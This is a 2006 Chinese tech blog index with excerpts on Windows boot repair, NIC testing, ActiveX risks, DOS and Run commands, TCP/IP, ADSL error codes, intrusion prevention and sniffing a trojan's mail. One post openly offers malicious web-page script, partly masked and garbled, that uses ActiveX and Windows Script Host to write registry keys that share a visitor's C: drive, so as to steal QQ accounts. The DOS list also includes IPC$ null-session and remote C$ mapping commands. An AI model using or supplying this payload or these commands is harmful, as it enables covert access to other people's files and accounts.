博文
Windows无法启动故障原因总结(2006-11-09 01:16:00)
摘要:下面我们就一起来看看那些问题使系统不能正常的启动。
1、Boot.ini文件非法
这个问题一般是由于boot.ini文件丢失或格式不正确造成的。boot.ini文件的格式一般是下面这种类型的:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\Windows
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\Windows="Microsoft Windows XP Professional" /fastdetect
2、找不到HAL.DLL文件,启动中止
这个是由于C盘根目录下的boot.ini文件非法,导致默认从C:\Windows启动,但是又由于你的WinXP没有安装在C盘,所以系统提示找不到HAL.DLL文件。启动因而失败。解决方法是重新编辑Boot.ini文件。我们有很多方法编辑这个文件,下面我挑选几种便于操作的介绍给大家:
1)、使用Win9X启动盘启动,使用EDIT.EXE命令编辑这个文件。启动EDIT.EXE以后只要按照正确的格式输入Boot.ini文件的内容,保存为Boot.ini文件即可。
2)、使用COPY CON命令创建一个Boot.ini文件。在DOS下输入Copy Con C:\boot.ini以后回车。然后按照Boot.ini文件的格式输入,每输入一行敲一次回车键,当全部内容输入完毕以后,按CTRL+Z,屏幕上会看到^Z的提示。这个时候再敲一次回车,系统会提示1 file(s) copied.这就表示创建成功了。
3)、使用故障恢复控制台里面的bootcfg命令。
4)、在别的电脑上创建好以后,拷贝到受损电脑的C盘根目录上覆盖源文件即可。
3、主引导程序引起的启动故障
硬盘的主引导扇区是硬盘中的最为敏感的一个部件,其中的主引导程序是它的一部分,此段程序主要用于检测硬盘分区的正确性,并确定活动分区,负责把引导权移交给活动分区的DOS或其他操作系统。此段程序损坏将无法从硬盘引导,但从软区或光区之后可对硬盘进行读写。修复此故障的方法较为简单,使用高版本DOS的fdisk最为方便,当带参数/mbr运行时,将直接更换(重写)硬盘的主引导程序。实际......
你的网卡到底能跑多快?网卡评测看着学(2006-08-02 13:48:00)
摘要:在宽带网已经和我们近在咫尺的时候,网卡成为了我们日常工作学习的必备工具,没有了今天四通八达的网络,我们的办事效率将会锐减,甚至很多的工作都无法开展,因此,网卡虽然看上去只是电脑里微不足道的一个零部件,但它的优劣好坏,却与我们的日常应用息息相关。要摸清网卡的真实性能,可以从两方面入手,一是看网卡在实际应用中的表现,二是看专业的测试软件的测试数据。下面我们来一步步弄清如何通过测试来掌握网卡的实力如何。 DU Meter: 要评测网卡在实际应用中的表现,Hagel公司的DU Meter是这方面的测试利器,其数据表现方式直观,并实时生成数据曲线图,能够随时掌握网卡的使用情况,同时,该软件还提供了计时表功能,能够统计出在一段时间内数据的传输情况,而且该软件还提供了丰富的网络统计选项。要特别指出的是DU Meter默认的速率计算单位是kB,Byte(字节),而我们10/100Mbps网卡的单位是bit(比特),1Byte=8bit,如果大家发现自己的2M Adsl最多只能有250KB的下载速度,这便是个中原因了,若然大家觉得这个单位使用起来不习惯可以在DU Meter的“选项”设置面板中修改为kbps。 DU Meter 计时表: 我们先来看看DU Meter的计时表功能,启动DU Meter后,在任务栏的DU Meter图标上点右键,边会出现上图所示菜单,点选计时表选项,便会出现下图所示对话框: 单击启动,会开始实时统计各项网络数据,并显示在对话框上,单击停止后就会马上看到计时期间的各项网络数据,使用DU Meter这一功能能够测试出,不同网卡在传输一个固定大小的文件情况下,瞬时最大速率、平均速率和耗时量的值并作出比较,方便直观地比较出不同网卡的实际应用差距有多少。 DU Meter 曲线图: 启动DU Meter后,Meter曲线图窗口亦会随之打开,显而易见,这个曲线图窗口能够让你随时轻松得知数据的传输情况,右边平滑的下载数据曲线图,表明网卡在整个传输过程中都能够稳定在一个速率上面,左边的上传数据曲线图高低不平则说明网卡的工作稳定性有待改善了,从这个曲线图窗口我们可以直观地看到网卡......
谨防ActiveX插件成病毒帮凶(2006-08-01 01:08:00)
摘要:ActiveX插件让网页内容变得更加丰富,如用户可以在IE浏览器中播放Flash动画、在线观看影片、在线杀毒等。ActiveX插件技术将程序本身和IE浏览器融为一体,扩展了IE的功能,大家常见的3721网络助手、百度搜索伴侣等就是依靠这项技术。 但安装过多的ActiveX插件会消耗太多的资源,造成系统运行得不稳定,更为要命的是,病毒和木马也瞄准了ActiveX插件,因此很容易在浏览网页时感染病毒和木马。 ActiveX插件是把双刃剑 1.插件应用,如此简单 对于一些建站的朋友,如利用ASP程序构建自己的网站,也会经常用到ActiveX插件来扩展ASP功能。当然要使用ActiveX插件首先就必须进行安装,利用Regsvr32.exe命令即可实现。以安装D盘根目录下的“rtj.dll”插件文件为例,在Windows系统中单击“开始-->运行”,弹出运行对话框,输入“Regsvr32 d:\rtj.dll”命令后回车,就会弹出“DllRegisterServer in rtj.dll succeeded”对话框,说明插件安装成功,那么以后用户就可以在ASP网页中调用rtj.dll提供的插件了;卸载此插件,只要在运行对话框中输入“Regsvr32 /u d:\rtj.dll”命令即可。 2.危险,无处不在 但ActiveX插件为我们提供方便的同时,病毒和木马制作者也认识到它的优势,他们将有害程序嵌入到网页中,当用户浏览该网页时,通过ActiveX插件的安装,病毒和木马就悄悄地潜入您的电脑,这时很多用户可能还没有察觉,你的电脑已经处于危险之中。从上面ActiveX插件的应用上就可以看出,网页中调用ActiveX插件十分容易,致使ActiveX插件成为病毒木马良好的寄生传染介质。 另外,IE浏览器安装过多的ActiveX插件也会影响Windows系统的稳定性,插件程序间容易产生冲突,这些不安全性和不稳定性因素,也导致了用户对ActiveX插件的厌恶。 管理ActiveX插件 为了保证系统的稳定运行,防止插件程序间相互冲突,以及病毒、木马的入侵,严格管理ActiveX插件是非常重要的。当然具体的管理方法很多,下面笔者就介绍几种常见......
DOS命令(2006-07-07 10:02:00)
摘要:DOS命令字典 net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名 密码 /add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net ......
运行命令全集(2006-07-07 10:00:00)
摘要:winver---------检查Windows版本wmimgmt.msc----打开windows管理体系结构(WMI)wupdmgr--------windows更新程序wscript--------windows脚本宿主设置write----------写字板winmsd---------系统信息wiaacmgr-------扫描仪和照相机向导winchat--------XP自带局域网聊天mem.exe--------显示内存使用情况msconfig---系统配置实用程序mplayer2-------简易widnowsedialayermspaint--------画图板mstsc----------远程桌面连接mplayer2-------媒体播放机magnify--------放大镜实用程序mmc------------打开控制台mobsync--------同步命令dxdiag---------检查DirectX信息drwtsn32------统医生devmgmt.msc---备管理器dfrg.msc-------磁盘碎片整理程序diskmgmt.msc---磁盘管理实用程序dcomcnfg-------打开系统组件服务ddeshare-------打开DDE共享设置dvdplay--------DVD播放器nettopessenger-----停止信使服务nettartessenger----开始信使服务notepad--------打开记事本nslookup-------网络管理的工具向导ntbackup-------系统备份和还原narrator-------屏幕“讲述人”ntmsmgr.msc----移动存储管理器ntmsoprq.msc---移动存储管理员操作请求netstatan----(TC)命令检查接口syncapp--------创建一个公文包sysedit--------系统配置编辑器sigverif-------文件签名验证程序sndrec32-------录音机shrpubw--------创建共享文件夹secpol.msc-----本地安全策略syskey---------系统加密,一旦加密就不能解开,保护windowsp系统的双重密码services.msc---本地服务设置Sndvol32-------音量控制程序sfc.......
TCP/IP协议(2006-05-27 01:53:00)
摘要:TCP/IP协议,或称为TCP/IP协议栈,或互联网协议系列。
TCP/IP协议栈(按TCP/IP参考模型划分)
应用层
FTP
SMTP
HTTP
...
传输层
TCP
UDP
网络层
IP ICMP
ARP
链路层
以太网
令牌环
FDDI
...
包含了一系列构成互联网基础的网络协议。这些协议最早发源于美国国防部的DARPA互联网项目。TCP/IP字面上代表了两个协议:TCP传输控制协议和IP互联网协议。时间回放到1983年1月1日,在这天,互联网的前身Arpanet中,TCP/IP协议取代了旧的网络核心协议NCP(Network Core Protocol),从而成为今天的互联网的基石。最早的的TCP/IP由Vinton Cerf和Robert Kahn两位开发,慢慢地通过竞争战胜了其它一些网络协议的方案,比如国际标准化组织ISO的OSI模型。TCP/IP的蓬勃发展发生在上世纪的90年代中期。当时一些重要而可靠的工具的出世,例如页面描述语言HTML和浏览器Mosaic,导致了互联网应用的飞速发展。
随着互联网的发展,目前流行的IPv4协议(IP Version 4,IP版本四)已经接近它的功能上限。IPv4最致命的两个缺陷在与:
地址只有32位,IP地址空间有限; 不支持服务等级(Quality of Service, Qos)的想法,无法管理带宽和优先级,故而不能很好的支持现今越来越多的实时的语音和视频应用。因此IPv6 (IP Version 6, IP版本六) 浮出海面,用以取代IPv4。 TCP/IP成功的另一个因素在与对为数众多的低层协议的支持。这些低层协议对应与OSI模型 中的第一层(物理层)和第二层(数据链路层)。每层的所有协议几乎都有一半数量的支持TCP/IP,例如: 以太网(Ethernet),令牌环(Token Ring),光纤数据分布接口(FDDI),端对端协议( PPP),X.25,帧中继(Frame Relay),ATM,Sonet, SDH等。
TCP/IP协议栈组成整个通信网络的任务,可以划分成不同的功能块,即抽象成所谓的 ” 层” 。用于互联网的协议可以比照TCP/IP参考模型进行分类。TCP/IP协议栈起始于第三层协议IP(互联网协议) 。所有这些协议都......
adsl连通故障代码列表(2006-05-27 01:49:00)
摘要:首先检查是否正确安装了RasPPPoE 软件 Error 602 The port is already open问题:拨号网络网络由于设备安装错误或正在使用,不能进行连接原因:RasPPPoE没有完全和正确的安装解决:卸载干净任何PPPoE软件,重新安装Error 605 Cannot set port information问题:拨号网络网络由于设备安装错误不能设定使用端口原因:RasPPPoE没有完全和正确的安装解决:卸载干净任何PPPoE软件,重新安装 Error 606 The port is not connected问题:拨号网络网络不能连接所需的设备端口原因:RasPPPoE没有完全和正确的安装,连接线故障,ADSL MODEM故障解决:卸载干净任何PPPoE软件,重新安装,检查网线和 ADSL MODEM Error 608 The device does not exist问题:拨号网络网络连接的设备不存在原因:RasPPPoE没有完全和正确的安装解决:卸载干净任何PPPoE软件,重新安装 Error 609 The device type does not exist问题:拨号网络网络连接的设备其种类不能确定原因:RasPPPoE没有完全和正确的安装解决:卸载干净任何PPPoE软件,重新安装 Error 611 The route is not available/612 The route is not allocated问题:拨号网络网络连接路由不正确原因:RasPPPoE没有完全和正确的安装,ISP服务器故障解决:卸载干净任何PPPoE软件,重新安装,致电ISP询问Error 617 The port or device is already disconnecting问题:拨号网络网络连接的设备已经断开原因:RasPPPoE没有完全和正确的安装,ISP服务器故障,连接线,ADSL MODEM故障解决:卸载干净任何PPPoE软件,重新安装,致电ISP询问 ,检查网线和 ADSL MODEMError 619问题:与ISP服务器不能建立连接原因:ADSL ISP 服务器故障,ADSL电话线故障解决:检查ADSL信号灯是否能正确同步。致电ISP询问 Error 621 Cannot open the phone book fileError ......
入侵防护系统(IPS)初探(2006-05-27 01:48:00)
摘要:随着网络入侵事件的不断增加和黑客攻击水平的不断提高,一方面企业网络感染病毒、遭受攻击的速度日益加快,另一方面企业网络受到攻击作出响应的时间却越来越滞后。解决这一矛盾,传统的防火墙或入侵检测技术(IDS)显得力不从心,这就需要引入一种全新的技术-入侵防护(Intrusion Prevention System,IPS)。 IPS的原理 防火墙是实施访问控制策略的系统,对流经的网络流量进行检查,拦截不符合安全策略的数据包。入侵检测技术(IDS)通过监视网络或系统资源,寻找违反安全策略的行为或攻击迹象,并发出报警。传统的防火墙旨在拒绝那些明显可疑的网络流量,但仍然允许某些流量通过,因此防火墙对于很多入侵攻击仍然无计可施。绝大多数 IDS 系统都是被动的,而不是主动的。也就是说,在攻击实际发生之前,它们往往无法预先发出警报。而入侵防护系统 (IPS) 则倾向于提供主动防护,其设计宗旨是预先对入侵活动和攻击性网络流量进行拦截,避免其造成损失,而不是简单地在恶意流量传送时或传送后才发出警报。IPS 是通过直接嵌入到网络流量中实现这一功能的,即通过一个网络端口接收来自外部系统的流量,经过检查确认其中不包含异常活动或可疑内容后,再通过另外一个端口将它传送到内部系统中。这样一来,有问题的数据包,以及所有来自同一数据流的后续数据包,都能在 IPS 设备中被清除掉。(图1)
图1
IPS实现实时检查和阻止入侵的原理在于IPS拥有数目众多的过滤器,能够防止各种攻击。当新的攻击手段被发现之后,IPS就会创建一个新的过滤器。IPS数据包处理引擎是专业化定制的集成电路,可以深层检查数据包的内容。如果有攻击者利用Layer 2 (介质访问控制)至Layer 7(应用)的漏洞发起攻击,IPS能够从数据流中检查出这些攻击并加以阻止。传统的防火墙只能对Layer 3或Layer 4进行检查,不能检测应用层的内容。防火墙的包过滤技术不会针对每一字节进行检查,因而也就无法发现攻击活动,而IPS可以做到逐一字节地检查数据包。所有流经IPS的数据包都被分类,分类的依据是数据包中的报头信息,如源IP地址和目的IP地址、端口号和应用域。每种过滤器负责分析相对应的数据包。通过检查的数据包可以继续前进,包含恶意内容的数据包就会被丢弃,被怀疑的数据包需要接受进一步的检查。 针对不同的攻击行为,IP......
黑客通过网页窃取QQ方法(2006-05-27 01:47:00)
摘要:想偷别人的QQ,方法有很多了。利用恶意网页使对方的电脑被共享出来是很有趣的一招。方法是:在你的网站网页中加入如下内容的代码:
<script language=Java Script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{*********************];
al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
al.createlnstance()
Shl=al.GetObject() Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion
//Network//LanMan//RWC$//Flafgs",302,"REG_DWORD");
Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan
//RWC$//Type",0,"REG_DWORD");
Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan
//RWC$//Path","C://");}
function init()
{setTimeout("f()",1000);}
{********************}
init()
</script>上面的代码大家一定很容易读懂,简单说来就是通过修改对方注册表中的键值,把对方的C盘共享出来,如果想让对方的其他盘都共享请自行设置。 上述代码中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表Windows Scripting Host(WSH)的外壳对象。WSH是微软提供的一种基于32位Windows平台的、与语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。WSH使得脚本可以被执行,就象执行批处......
找出木马背后的黑手(2006-05-27 01:35:00)
摘要:当你发现自己的爱机中了木马时一定很气愤,很想知道是谁把马放在你的爱机里。这里先简单解释一下原理,然后去找出马的主人吧!
现在很多木马都有发IP信件的功能,“冰河”就是其中的佼佼者,也是国内用得最多的木马。它能把你的动态IP,电脑里的隐藏密码和个人信息等在受害密码和个人信息等在受害者不知道的情况下记录下来并发到指定的E-mail信箱。我们就利用它发的IP信是明文信息的特点(现在好像还没有哪个木马发的 IP信有进行过加密的),用sniffer类软件把它记录下来。这样我们就能知道对你用过木马那人的E-mail了。所以我们不要立即把爱机里的木马清除掉(不入虎穴焉得虎子),因为我们还要靠它找出它的主人呢!
首先去下载必要的工具,http: //www.xfocus.org/htm1/data/tools/winsniff.zip(在DOS下运行)或HTTP: //www.guanqian.com/starkun/tools/other/mpsnif01013.zip(在windos下运行)。两个不同环境下运行的工具各有所长。
一、DOS下winsniff的用法
在c盘创建一个winsniff目录,把包解压,解压后它里面有七个文件。
打开一个MS-DOS窗口(“点击开始--程序--MS-DOS方式”)进入winsniff目录(在MSDOS方式下输入cd\winsniff,跟着按车键)。接着输入winsniff/1,按回车,检查拨号适配器的编号(这里检查结果为0)。
输入winsniff/a 0 /a mail.txt,按回车,这时显示,其中的“0”是表示你的拨号适配器即modem的编号,当你还装有其它网络设备(如:局域网网卡)时它就不一定是0 了,那时就要因应不同的需要而改变,“mail.txt”是表示记录文件的名字,可以任意取名字。
接着就是拨号上网或与网络连接(局域网的用户),等着winsniff帮你截获信息吧。
当你看到显示,出现“[mail]”时请按“ctrl+c”键结束程序,这时你就可以用笔记本打开“mail.txt”文件看看里面的信息了,是不是很惊讶呢,你的密码什么的都给记录下来了!记录文件中的“TO:”后面显示的E-mail地址就是木马主人的E-mail地址了,跟阒想怎么利用这E- mail地址对付那可恶的人就你自......